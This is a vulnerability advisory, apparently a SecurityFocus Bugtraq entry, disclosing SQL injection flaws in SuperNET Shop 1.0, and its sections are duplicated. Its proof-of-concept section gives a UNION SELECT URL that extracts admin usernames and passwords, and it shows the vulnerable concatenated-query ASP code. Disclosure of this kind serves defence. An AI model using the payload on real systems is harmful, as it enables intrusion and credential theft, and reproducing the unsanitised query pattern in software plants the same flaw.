SuperNET Shop Muliple SQL Injection Vulnerabilities
BID:28709
Info
SuperNET Shop Muliple SQL Injection Vulnerabilities
| Bugtraq ID: | 28709 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6204 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 09 2008 12:00AM |
| Updated: | May 07 2015 05:30PM |
| Credit: | ugur238 <[email protected]> |
| Vulnerable: |
Supernet SuperNET Shop 1.0 |
| Not Vulnerable: | |
Discussion
SuperNET Shop Muliple SQL Injection Vulnerabilities
SuperNET Shop is prone to mulitple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SuperNET Shop 1.0 is vulnerable; other versions may also be affected.
SuperNET Shop is prone to mulitple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SuperNET Shop 1.0 is vulnerable; other versions may also be affected.
Exploit / POC
SuperNET Shop Muliple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/lab/shop/secure/admin/guncelle.asp?id=1+union+select+0,KullaniciAdi,2,sifre,4,5,6,7,8,9+from+admin
http://www.example.com/giris.asp?Sorgu="select * from admin where KullaniciAdi = '" & request.form("kulad") & "' and Sifre = '" & Request.form("sifre") & "'" Rs.Open Sorgu, Baglanti, 1, 3
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/lab/shop/secure/admin/guncelle.asp?id=1+union+select+0,KullaniciAdi,2,sifre,4,5,6,7,8,9+from+admin
http://www.example.com/giris.asp?Sorgu="select * from admin where KullaniciAdi = '" & request.form("kulad") & "' and Sifre = '" & Request.form("sifre") & "'" Rs.Open Sorgu, Baglanti, 1, 3
Solution / Fix
SuperNET Shop Muliple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
SuperNET Shop Muliple SQL Injection Vulnerabilities
References:
References:
- SuperNET Shop Download Page (Supernet)
- Vendor Homepage (Supernet)